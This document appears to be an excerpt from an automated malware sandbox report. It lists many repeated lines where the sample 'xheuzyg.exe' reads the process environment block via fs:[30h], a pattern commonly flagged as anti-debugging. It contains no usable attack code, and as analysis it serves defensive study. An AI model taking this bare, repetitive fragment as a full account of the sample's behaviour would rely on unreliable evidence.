Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01642349 mov eax, dword ptr fs:[00000030h]	4_2_01642349
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01642349 mov eax, dword ptr fs:[00000030h]	4_2_01642349
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01642349 mov eax, dword ptr fs:[00000030h]	4_2_01642349
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01642349 mov eax, dword ptr fs:[00000030h]	4_2_01642349
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01642349 mov eax, dword ptr fs:[00000030h]	4_2_01642349
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01642349 mov eax, dword ptr fs:[00000030h]	4_2_01642349
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01642349 mov eax, dword ptr fs:[00000030h]	4_2_01642349
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01642349 mov eax, dword ptr fs:[00000030h]	4_2_01642349
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01642349 mov eax, dword ptr fs:[00000030h]	4_2_01642349
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01642349 mov eax, dword ptr fs:[00000030h]	4_2_01642349
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01642349 mov eax, dword ptr fs:[00000030h]	4_2_01642349
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01642349 mov eax, dword ptr fs:[00000030h]	4_2_01642349
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01642349 mov eax, dword ptr fs:[00000030h]	4_2_01642349
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01642349 mov eax, dword ptr fs:[00000030h]	4_2_01642349
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01668350 mov ecx, dword ptr fs:[00000030h]	4_2_01668350
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0164035C mov eax, dword ptr fs:[00000030h]	4_2_0164035C
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0164035C mov eax, dword ptr fs:[00000030h]	4_2_0164035C
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0164035C mov eax, dword ptr fs:[00000030h]	4_2_0164035C
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0164035C mov ecx, dword ptr fs:[00000030h]	4_2_0164035C
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0164035C mov eax, dword ptr fs:[00000030h]	4_2_0164035C
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0164035C mov eax, dword ptr fs:[00000030h]	4_2_0164035C
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0168A352 mov eax, dword ptr fs:[00000030h]	4_2_0168A352
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015BC310 mov ecx, dword ptr fs:[00000030h]	4_2_015BC310
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01698324 mov eax, dword ptr fs:[00000030h]	4_2_01698324
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01698324 mov ecx, dword ptr fs:[00000030h]	4_2_01698324
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01698324 mov eax, dword ptr fs:[00000030h]	4_2_01698324
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01698324 mov eax, dword ptr fs:[00000030h]	4_2_01698324
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015E0310 mov ecx, dword ptr fs:[00000030h]	4_2_015E0310
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015FA30B mov eax, dword ptr fs:[00000030h]	4_2_015FA30B
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015FA30B mov eax, dword ptr fs:[00000030h]	4_2_015FA30B
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015FA30B mov eax, dword ptr fs:[00000030h]	4_2_015FA30B
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015CA3C0 mov eax, dword ptr fs:[00000030h]	4_2_015CA3C0
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015CA3C0 mov eax, dword ptr fs:[00000030h]	4_2_015CA3C0
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015CA3C0 mov eax, dword ptr fs:[00000030h]	4_2_015CA3C0
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015CA3C0 mov eax, dword ptr fs:[00000030h]	4_2_015CA3C0
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015CA3C0 mov eax, dword ptr fs:[00000030h]	4_2_015CA3C0
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015CA3C0 mov eax, dword ptr fs:[00000030h]	4_2_015CA3C0
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015C83C0 mov eax, dword ptr fs:[00000030h]	4_2_015C83C0
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015C83C0 mov eax, dword ptr fs:[00000030h]	4_2_015C83C0
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015C83C0 mov eax, dword ptr fs:[00000030h]	4_2_015C83C0
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015C83C0 mov eax, dword ptr fs:[00000030h]	4_2_015C83C0
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015F63FF mov eax, dword ptr fs:[00000030h]	4_2_015F63FF
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_016463C0 mov eax, dword ptr fs:[00000030h]	4_2_016463C0
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0167C3CD mov eax, dword ptr fs:[00000030h]	4_2_0167C3CD
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015DE3F0 mov eax, dword ptr fs:[00000030h]	4_2_015DE3F0
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015DE3F0 mov eax, dword ptr fs:[00000030h]	4_2_015DE3F0
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015DE3F0 mov eax, dword ptr fs:[00000030h]	4_2_015DE3F0
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_016643D4 mov eax, dword ptr fs:[00000030h]	4_2_016643D4
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_016643D4 mov eax, dword ptr fs:[00000030h]	4_2_016643D4
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015D03E9 mov eax, dword ptr fs:[00000030h]	4_2_015D03E9
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015D03E9 mov eax, dword ptr fs:[00000030h]	4_2_015D03E9
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015D03E9 mov eax, dword ptr fs:[00000030h]	4_2_015D03E9
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015D03E9 mov eax, dword ptr fs:[00000030h]	4_2_015D03E9
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015D03E9 mov eax, dword ptr fs:[00000030h]	4_2_015D03E9
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015D03E9 mov eax, dword ptr fs:[00000030h]	4_2_015D03E9
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015D03E9 mov eax, dword ptr fs:[00000030h]	4_2_015D03E9
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015D03E9 mov eax, dword ptr fs:[00000030h]	4_2_015D03E9
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0166E3DB mov eax, dword ptr fs:[00000030h]	4_2_0166E3DB
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0166E3DB mov eax, dword ptr fs:[00000030h]	4_2_0166E3DB
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0166E3DB mov ecx, dword ptr fs:[00000030h]	4_2_0166E3DB
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0166E3DB mov eax, dword ptr fs:[00000030h]	4_2_0166E3DB
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015B8397 mov eax, dword ptr fs:[00000030h]	4_2_015B8397
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015B8397 mov eax, dword ptr fs:[00000030h]	4_2_015B8397
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015B8397 mov eax, dword ptr fs:[00000030h]	4_2_015B8397
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015E438F mov eax, dword ptr fs:[00000030h]	4_2_015E438F
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015E438F mov eax, dword ptr fs:[00000030h]	4_2_015E438F
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015BE388 mov eax, dword ptr fs:[00000030h]	4_2_015BE388
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015BE388 mov eax, dword ptr fs:[00000030h]	4_2_015BE388
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015BE388 mov eax, dword ptr fs:[00000030h]	4_2_015BE388
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015C6259 mov eax, dword ptr fs:[00000030h]	4_2_015C6259
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015BA250 mov eax, dword ptr fs:[00000030h]	4_2_015BA250
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01670274 mov eax, dword ptr fs:[00000030h]	4_2_01670274
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01670274 mov eax, dword ptr fs:[00000030h]	4_2_01670274
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01670274 mov eax, dword ptr fs:[00000030h]	4_2_01670274
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01670274 mov eax, dword ptr fs:[00000030h]	4_2_01670274
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01670274 mov eax, dword ptr fs:[00000030h]	4_2_01670274
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01670274 mov eax, dword ptr fs:[00000030h]	4_2_01670274
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01670274 mov eax, dword ptr fs:[00000030h]	4_2_01670274
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01670274 mov eax, dword ptr fs:[00000030h]	4_2_01670274
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01670274 mov eax, dword ptr fs:[00000030h]	4_2_01670274
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01670274 mov eax, dword ptr fs:[00000030h]	4_2_01670274
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01670274 mov eax, dword ptr fs:[00000030h]	4_2_01670274
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01670274 mov eax, dword ptr fs:[00000030h]	4_2_01670274
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01648243 mov eax, dword ptr fs:[00000030h]	4_2_01648243
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01648243 mov ecx, dword ptr fs:[00000030h]	4_2_01648243
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015B826B mov eax, dword ptr fs:[00000030h]	4_2_015B826B
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0169625D mov eax, dword ptr fs:[00000030h]	4_2_0169625D
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0167A250 mov eax, dword ptr fs:[00000030h]	4_2_0167A250
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0167A250 mov eax, dword ptr fs:[00000030h]	4_2_0167A250
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015C4260 mov eax, dword ptr fs:[00000030h]	4_2_015C4260
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015C4260 mov eax, dword ptr fs:[00000030h]	4_2_015C4260
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015C4260 mov eax, dword ptr fs:[00000030h]	4_2_015C4260
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015B823B mov eax, dword ptr fs:[00000030h]	4_2_015B823B
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015CA2C3 mov eax, dword ptr fs:[00000030h]	4_2_015CA2C3
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015CA2C3 mov eax, dword ptr fs:[00000030h]	4_2_015CA2C3
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015CA2C3 mov eax, dword ptr fs:[00000030h]	4_2_015CA2C3
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015CA2C3 mov eax, dword ptr fs:[00000030h]	4_2_015CA2C3
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015CA2C3 mov eax, dword ptr fs:[00000030h]	4_2_015CA2C3
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015D02E1 mov eax, dword ptr fs:[00000030h]	4_2_015D02E1
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015D02E1 mov eax, dword ptr fs:[00000030h]	4_2_015D02E1
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015D02E1 mov eax, dword ptr fs:[00000030h]	4_2_015D02E1
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_016962D6 mov eax, dword ptr fs:[00000030h]	4_2_016962D6
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_016562A0 mov eax, dword ptr fs:[00000030h]	4_2_016562A0
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_016562A0 mov ecx, dword ptr fs:[00000030h]	4_2_016562A0
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_016562A0 mov eax, dword ptr fs:[00000030h]	4_2_016562A0
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_016562A0 mov eax, dword ptr fs:[00000030h]	4_2_016562A0
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_016562A0 mov eax, dword ptr fs:[00000030h]	4_2_016562A0
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_016562A0 mov eax, dword ptr fs:[00000030h]	4_2_016562A0
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015FE284 mov eax, dword ptr fs:[00000030h]	4_2_015FE284
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015FE284 mov eax, dword ptr fs:[00000030h]	4_2_015FE284
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01640283 mov eax, dword ptr fs:[00000030h]	4_2_01640283
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01640283 mov eax, dword ptr fs:[00000030h]	4_2_01640283
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01640283 mov eax, dword ptr fs:[00000030h]	4_2_01640283
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015D02A0 mov eax, dword ptr fs:[00000030h]	4_2_015D02A0
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015D02A0 mov eax, dword ptr fs:[00000030h]	4_2_015D02A0
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015C8550 mov eax, dword ptr fs:[00000030h]	4_2_015C8550
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015C8550 mov eax, dword ptr fs:[00000030h]	4_2_015C8550
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015F656A mov eax, dword ptr fs:[00000030h]	4_2_015F656A
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015F656A mov eax, dword ptr fs:[00000030h]	4_2_015F656A
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015F656A mov eax, dword ptr fs:[00000030h]	4_2_015F656A
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015EE53E mov eax, dword ptr fs:[00000030h]	4_2_015EE53E
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015EE53E mov eax, dword ptr fs:[00000030h]	4_2_015EE53E
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015EE53E mov eax, dword ptr fs:[00000030h]	4_2_015EE53E
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015EE53E mov eax, dword ptr fs:[00000030h]	4_2_015EE53E
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015EE53E mov eax, dword ptr fs:[00000030h]	4_2_015EE53E
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01656500 mov eax, dword ptr fs:[00000030h]	4_2_01656500
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015D0535 mov eax, dword ptr fs:[00000030h]	4_2_015D0535
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015D0535 mov eax, dword ptr fs:[00000030h]	4_2_015D0535
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015D0535 mov eax, dword ptr fs:[00000030h]	4_2_015D0535
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015D0535 mov eax, dword ptr fs:[00000030h]	4_2_015D0535
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015D0535 mov eax, dword ptr fs:[00000030h]	4_2_015D0535
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015D0535 mov eax, dword ptr fs:[00000030h]	4_2_015D0535
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01694500 mov eax, dword ptr fs:[00000030h]	4_2_01694500
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01694500 mov eax, dword ptr fs:[00000030h]	4_2_01694500
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01694500 mov eax, dword ptr fs:[00000030h]	4_2_01694500
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01694500 mov eax, dword ptr fs:[00000030h]	4_2_01694500
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01694500 mov eax, dword ptr fs:[00000030h]	4_2_01694500
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01694500 mov eax, dword ptr fs:[00000030h]	4_2_01694500
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01694500 mov eax, dword ptr fs:[00000030h]	4_2_01694500
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015C65D0 mov eax, dword ptr fs:[00000030h]	4_2_015C65D0
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015FA5D0 mov eax, dword ptr fs:[00000030h]	4_2_015FA5D0
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015FA5D0 mov eax, dword ptr fs:[00000030h]	4_2_015FA5D0
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015FE5CF mov eax, dword ptr fs:[00000030h]	4_2_015FE5CF
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015FE5CF mov eax, dword ptr fs:[00000030h]	4_2_015FE5CF
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015FC5ED mov eax, dword ptr fs:[00000030h]	4_2_015FC5ED
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015FC5ED mov eax, dword ptr fs:[00000030h]	4_2_015FC5ED
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015EE5E7 mov eax, dword ptr fs:[00000030h]	4_2_015EE5E7
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015EE5E7 mov eax, dword ptr fs:[00000030h]	4_2_015EE5E7
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015EE5E7 mov eax, dword ptr fs:[00000030h]	4_2_015EE5E7
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015EE5E7 mov eax, dword ptr fs:[00000030h]	4_2_015EE5E7
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015EE5E7 mov eax, dword ptr fs:[00000030h]	4_2_015EE5E7
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015EE5E7 mov eax, dword ptr fs:[00000030h]	4_2_015EE5E7
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015EE5E7 mov eax, dword ptr fs:[00000030h]	4_2_015EE5E7
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015EE5E7 mov eax, dword ptr fs:[00000030h]	4_2_015EE5E7
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015C25E0 mov eax, dword ptr fs:[00000030h]	4_2_015C25E0
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015FE59C mov eax, dword ptr fs:[00000030h]	4_2_015FE59C
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_016405A7 mov eax, dword ptr fs:[00000030h]	4_2_016405A7
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_016405A7 mov eax, dword ptr fs:[00000030h]	4_2_016405A7
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_016405A7 mov eax, dword ptr fs:[00000030h]	4_2_016405A7
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015F4588 mov eax, dword ptr fs:[00000030h]	4_2_015F4588
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015C2582 mov eax, dword ptr fs:[00000030h]	4_2_015C2582
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015C2582 mov ecx, dword ptr fs:[00000030h]	4_2_015C2582
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015E45B1 mov eax, dword ptr fs:[00000030h]	4_2_015E45B1
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015E45B1 mov eax, dword ptr fs:[00000030h]	4_2_015E45B1
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015E245A mov eax, dword ptr fs:[00000030h]	4_2_015E245A
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0164C460 mov ecx, dword ptr fs:[00000030h]	4_2_0164C460
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015B645D mov eax, dword ptr fs:[00000030h]	4_2_015B645D
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015FE443 mov eax, dword ptr fs:[00000030h]	4_2_015FE443
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015FE443 mov eax, dword ptr fs:[00000030h]	4_2_015FE443
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015FE443 mov eax, dword ptr fs:[00000030h]	4_2_015FE443
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015FE443 mov eax, dword ptr fs:[00000030h]	4_2_015FE443
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015FE443 mov eax, dword ptr fs:[00000030h]	4_2_015FE443
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015FE443 mov eax, dword ptr fs:[00000030h]	4_2_015FE443
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015FE443 mov eax, dword ptr fs:[00000030h]	4_2_015FE443
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015FE443 mov eax, dword ptr fs:[00000030h]	4_2_015FE443
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015EA470 mov eax, dword ptr fs:[00000030h]	4_2_015EA470
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015EA470 mov eax, dword ptr fs:[00000030h]	4_2_015EA470
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015EA470 mov eax, dword ptr fs:[00000030h]	4_2_015EA470
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0167A456 mov eax, dword ptr fs:[00000030h]	4_2_0167A456
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01646420 mov eax, dword ptr fs:[00000030h]	4_2_01646420
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01646420 mov eax, dword ptr fs:[00000030h]	4_2_01646420
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01646420 mov eax, dword ptr fs:[00000030h]	4_2_01646420
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01646420 mov eax, dword ptr fs:[00000030h]	4_2_01646420
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01646420 mov eax, dword ptr fs:[00000030h]	4_2_01646420
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01646420 mov eax, dword ptr fs:[00000030h]	4_2_01646420
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01646420 mov eax, dword ptr fs:[00000030h]	4_2_01646420
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015F8402 mov eax, dword ptr fs:[00000030h]	4_2_015F8402
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015F8402 mov eax, dword ptr fs:[00000030h]	4_2_015F8402
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015F8402 mov eax, dword ptr fs:[00000030h]	4_2_015F8402
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015FA430 mov eax, dword ptr fs:[00000030h]	4_2_015FA430
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015BE420 mov eax, dword ptr fs:[00000030h]	4_2_015BE420
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015BE420 mov eax, dword ptr fs:[00000030h]	4_2_015BE420
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015BE420 mov eax, dword ptr fs:[00000030h]	4_2_015BE420
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015BC427 mov eax, dword ptr fs:[00000030h]	4_2_015BC427
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015C04E5 mov ecx, dword ptr fs:[00000030h]	4_2_015C04E5
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0164A4B0 mov eax, dword ptr fs:[00000030h]	4_2_0164A4B0
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015F44B0 mov ecx, dword ptr fs:[00000030h]	4_2_015F44B0
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015C64AB mov eax, dword ptr fs:[00000030h]	4_2_015C64AB
